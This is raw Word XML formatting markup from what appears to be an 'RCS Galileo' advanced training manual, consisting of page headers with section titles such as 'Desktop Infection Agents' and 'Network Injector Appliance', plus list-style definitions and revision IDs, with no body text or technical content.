        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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87756C">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60D561B8" wp14:editId="7512AEA0">
                <wp:extent cx="2422922" cy="42862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5F5F5B" w:rsidRDefault="0029192C" w:rsidP="005F5F5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051467">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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858"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00240B6F">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>RCS Galileo Architecture</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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051467">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D3DB02" wp14:editId="7485D2B6">
                <wp:extent cx="2422922" cy="428625"/>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051467">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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860"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00240B6F">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Accounting and Operations</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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051467">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF17B0A" wp14:editId="670A1043">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="0"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051467">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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860"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00240B6F">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Intelligence</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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051467">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081ECE2F" wp14:editId="20D88D82">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="0"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051467">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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7"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00240B6F">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Desktop Factories Configuration</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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051467">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E70426C" wp14:editId="63B11BDF">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="0" b="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p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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87756C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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2"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00134262">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00D618FA">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Desktop Infection Agents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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87756C">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C8736EB" wp14:editId="0A52A759">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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87756C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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2"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00134262">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00D618FA">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Tactical Network Injector (TNI)</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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87756C">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FEAA9DF" wp14:editId="08838DC2">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="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87756C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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861"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00134262">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00D618FA">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Network Injector Appliance (NIA)</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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87756C">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39E1F25D" wp14:editId="2C1BBE0A">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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92C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="righ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2"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00134262">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00D618FA">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Mobile Infection Agents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:ind w:hanging="108"/>
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve">Advanced </w:t>
          </w:r>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Training Manual</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492A354E" wp14:editId="734BD091">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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536" cy="429441"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>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p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756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58EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ECE3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08005DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B3E48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A7A3A94"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49CA4A2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BAC215A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D04A54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19555B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ECE3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0595F90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7D2475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13B45CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7FA63E0"/>
    <w:lvl w:ilvl="0" w:tplc="6AD2784E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Courier New" w:cs="Courier New"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6253F9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D04A54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31E6371"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D60401C4"/>
    <w:lvl w:ilvl="0" w:tplc="E444AF3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri"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2F30C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="941A149A"/>
    <w:lvl w:ilvl="0" w:tplc="16867652">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1074" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cstheme="minorBidi" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1794" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2514" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3234" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3954" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4674" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5394" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6114" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6834"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7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>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A74"/>
    <w:rsid w:val="000000F5"/>
    <w:rsid w:val="00002CBA"/>
    <w:rsid w:val="000054B1"/>
    <w:rsid w:val="00011EBB"/>
    <w:rsid w:val="00015715"/>
    <w:rsid w:val="00015D05"/>
    <w:rsid w:val="000172D9"/>
    <w:rsid w:val="00017EFC"/>
    <w:rsid w:val="00020499"/>
    <w:rsid w:val="00023759"/>
    <w:rsid w:val="0003387E"/>
    <w:rsid w:val="00035814"/>
    <w:rsid w:val="00036118"/>
    <w:rsid w:val="00036C4C"/>
    <w:rsid w:val="00040315"/>
    <w:rsid w:val="000407FC"/>
    <w:rsid w:val="000450A6"/>
    <w:rsid w:val="00051467"/>
    <w:rsid w:val="000541CB"/>
    <w:rsid w:val="00054AD3"/>
    <w:rsid w:val="0005662C"/>
    <w:rsid w:val="00057420"/>
    <w:rsid w:val="00057B63"/>
    <w:rsid w:val="00057E0C"/>
    <w:rsid w:val="000605E9"/>
    <w:rsid w:val="00061FD3"/>
    <w:rsid w:val="00064569"/>
    <w:rsid w:val="00065E46"/>
    <w:rsid w:val="00071661"/>
    <w:rsid w:val="000718D9"/>
    <w:rsid w:val="000725C6"/>
    <w:rsid w:val="000725FF"/>
    <w:rsid w:val="00073FB1"/>
    <w:rsid w:val="000752EB"/>
    <w:rsid w:val="00075F77"/>
    <w:rsid w:val="000773C1"/>
    <w:rsid w:val="000827CA"/>
    <w:rsid w:val="00083149"/>
    <w:rsid w:val="0008431A"/>
    <w:rsid w:val="000843EC"/>
    <w:rsid w:val="00086057"/>
    <w:rsid w:val="00086CB2"/>
    <w:rsid w:val="00087607"/>
    <w:rsid w:val="000918A3"/>
    <w:rsid w:val="000939F4"/>
    <w:rsid w:val="000942D6"/>
    <w:rsid w:val="00095D52"/>
    <w:rsid w:val="000A30B9"/>
    <w:rsid w:val="000B1009"/>
    <w:rsid w:val="000B1400"/>
    <w:rsid w:val="000B2165"/>
    <w:rsid w:val="000B21DF"/>
    <w:rsid w:val="000B4CEE"/>
    <w:rsid w:val="000B5282"/>
    <w:rsid w:val="000B7779"/>
    <w:rsid w:val="000B7BBF"/>
    <w:rsid w:val="000C09F3"/>
    <w:rsid w:val="000C264F"/>
    <w:rsid w:val="000C2BD7"/>
    <w:rsid w:val="000C40C0"/>
    <w:rsid w:val="000C4FC9"/>
    <w:rsid w:val="000C653B"/>
    <w:rsid w:val="000C701A"/>
    <w:rsid w:val="000C7020"/>
    <w:rsid w:val="000D2568"/>
    <w:rsid w:val="000D4BBF"/>
    <w:rsid w:val="000D600F"/>
    <w:rsid w:val="000E0581"/>
    <w:rsid w:val="000E40BB"/>
    <w:rsid w:val="000F1939"/>
    <w:rsid w:val="000F1EA6"/>
    <w:rsid w:val="000F2135"/>
    <w:rsid w:val="000F2CBB"/>
    <w:rsid w:val="000F35E0"/>
    <w:rsid w:val="000F5A4E"/>
    <w:rsid w:val="0010013A"/>
    <w:rsid w:val="0010117A"/>
    <w:rsid w:val="00101623"/>
    <w:rsid w:val="00102E97"/>
    <w:rsid w:val="0010351B"/>
    <w:rsid w:val="0010498E"/>
    <w:rsid w:val="00104CC3"/>
    <w:rsid w:val="001109BC"/>
    <w:rsid w:val="00110F98"/>
    <w:rsid w:val="00110FA5"/>
    <w:rsid w:val="00111E7F"/>
    <w:rsid w:val="0011594F"/>
    <w:rsid w:val="00116CFD"/>
    <w:rsid w:val="00117549"/>
    <w:rsid w:val="00120B87"/>
    <w:rsid w:val="00121E4B"/>
    <w:rsid w:val="00122E2F"/>
    <w:rsid w:val="001231B5"/>
    <w:rsid w:val="00127C42"/>
    <w:rsid w:val="00130C04"/>
    <w:rsid w:val="00133697"/>
    <w:rsid w:val="00134262"/>
    <w:rsid w:val="0013700D"/>
    <w:rsid w:val="001405A3"/>
    <w:rsid w:val="00141F2F"/>
    <w:rsid w:val="00145C36"/>
    <w:rsid w:val="00145C50"/>
    <w:rsid w:val="00150570"/>
    <w:rsid w:val="00150BDA"/>
    <w:rsid w:val="00151DE6"/>
    <w:rsid w:val="00152B17"/>
    <w:rsid w:val="00153800"/>
    <w:rsid w:val="00155C0D"/>
    <w:rsid w:val="00157565"/>
    <w:rsid w:val="00157949"/>
    <w:rsid w:val="00157989"/>
    <w:rsid w:val="00161212"/>
    <w:rsid w:val="00163021"/>
    <w:rsid w:val="0016338D"/>
    <w:rsid w:val="001633C0"/>
    <w:rsid w:val="001676B5"/>
    <w:rsid w:val="00167D77"/>
    <w:rsid w:val="00167E63"/>
    <w:rsid w:val="00171249"/>
    <w:rsid w:val="001738A5"/>
    <w:rsid w:val="00174A50"/>
    <w:rsid w:val="00175976"/>
    <w:rsid w:val="001774A1"/>
    <w:rsid w:val="00177AC2"/>
    <w:rsid w:val="0018169C"/>
    <w:rsid w:val="001830A3"/>
    <w:rsid w:val="00183A31"/>
    <w:rsid w:val="00185EC8"/>
    <w:rsid w:val="00186D20"/>
    <w:rsid w:val="00197088"/>
    <w:rsid w:val="001A1AB2"/>
    <w:rsid w:val="001A2D9E"/>
    <w:rsid w:val="001A40A0"/>
    <w:rsid w:val="001A489F"/>
    <w:rsid w:val="001A509B"/>
    <w:rsid w:val="001A6B03"/>
    <w:rsid w:val="001B047B"/>
    <w:rsid w:val="001B1528"/>
    <w:rsid w:val="001B478B"/>
    <w:rsid w:val="001B58B6"/>
    <w:rsid w:val="001C2243"/>
    <w:rsid w:val="001C360F"/>
    <w:rsid w:val="001C7768"/>
    <w:rsid w:val="001D0448"/>
    <w:rsid w:val="001D326B"/>
    <w:rsid w:val="001D4D77"/>
    <w:rsid w:val="001D4DA3"/>
    <w:rsid w:val="001D58BE"/>
    <w:rsid w:val="001D595F"/>
    <w:rsid w:val="001D6BFD"/>
    <w:rsid w:val="001D7A94"/>
    <w:rsid w:val="001E308E"/>
    <w:rsid w:val="001E5EC9"/>
    <w:rsid w:val="001E69F5"/>
    <w:rsid w:val="001E7A4B"/>
    <w:rsid w:val="001F0B7A"/>
    <w:rsid w:val="001F16B4"/>
    <w:rsid w:val="001F1F33"/>
    <w:rsid w:val="001F2BD2"/>
    <w:rsid w:val="001F3283"/>
    <w:rsid w:val="001F386E"/>
    <w:rsid w:val="001F50EF"/>
    <w:rsid w:val="001F5D11"/>
    <w:rsid w:val="001F6D35"/>
    <w:rsid w:val="00200754"/>
    <w:rsid w:val="00203F58"/>
    <w:rsid w:val="00205C0F"/>
    <w:rsid w:val="00206303"/>
    <w:rsid w:val="00206680"/>
    <w:rsid w:val="00212F61"/>
    <w:rsid w:val="002142C0"/>
    <w:rsid w:val="00214D97"/>
    <w:rsid w:val="00215095"/>
    <w:rsid w:val="00216578"/>
    <w:rsid w:val="002175DC"/>
    <w:rsid w:val="00217E95"/>
    <w:rsid w:val="00224FDB"/>
    <w:rsid w:val="00225948"/>
    <w:rsid w:val="00231D89"/>
    <w:rsid w:val="00233220"/>
    <w:rsid w:val="002332CD"/>
    <w:rsid w:val="0023442F"/>
    <w:rsid w:val="002346EF"/>
    <w:rsid w:val="00234B84"/>
    <w:rsid w:val="002365CA"/>
    <w:rsid w:val="00237218"/>
    <w:rsid w:val="00240B6F"/>
    <w:rsid w:val="0024621D"/>
    <w:rsid w:val="00247880"/>
    <w:rsid w:val="0025099E"/>
    <w:rsid w:val="0025641B"/>
    <w:rsid w:val="0027043A"/>
    <w:rsid w:val="00271150"/>
    <w:rsid w:val="00271B68"/>
    <w:rsid w:val="00272286"/>
    <w:rsid w:val="002743D7"/>
    <w:rsid w:val="00274B0E"/>
    <w:rsid w:val="002755A5"/>
    <w:rsid w:val="00276033"/>
    <w:rsid w:val="0027669A"/>
    <w:rsid w:val="00284C17"/>
    <w:rsid w:val="002863A0"/>
    <w:rsid w:val="002879F8"/>
    <w:rsid w:val="00287BCB"/>
    <w:rsid w:val="00290AFC"/>
    <w:rsid w:val="00290B99"/>
    <w:rsid w:val="0029138B"/>
    <w:rsid w:val="002913DF"/>
    <w:rsid w:val="0029192C"/>
    <w:rsid w:val="002954E4"/>
    <w:rsid w:val="00295658"/>
    <w:rsid w:val="00295FC5"/>
    <w:rsid w:val="00296210"/>
    <w:rsid w:val="0029750F"/>
    <w:rsid w:val="002A078D"/>
    <w:rsid w:val="002A129B"/>
    <w:rsid w:val="002A187A"/>
    <w:rsid w:val="002A2E6C"/>
    <w:rsid w:val="002A3E2E"/>
    <w:rsid w:val="002A5002"/>
    <w:rsid w:val="002A549D"/>
    <w:rsid w:val="002A5F1E"/>
    <w:rsid w:val="002A6DDF"/>
    <w:rsid w:val="002A7C6F"/>
    <w:rsid w:val="002B0DDE"/>
    <w:rsid w:val="002B2AEF"/>
    <w:rsid w:val="002B32DE"/>
    <w:rsid w:val="002B3B50"/>
    <w:rsid w:val="002B7DFA"/>
    <w:rsid w:val="002C1F18"/>
    <w:rsid w:val="002C2CAD"/>
    <w:rsid w:val="002C3998"/>
    <w:rsid w:val="002C3F2A"/>
    <w:rsid w:val="002C6B36"/>
    <w:rsid w:val="002D38AD"/>
    <w:rsid w:val="002D3DBC"/>
    <w:rsid w:val="002D7F2D"/>
    <w:rsid w:val="002E0012"/>
    <w:rsid w:val="002E184E"/>
    <w:rsid w:val="002E25B4"/>
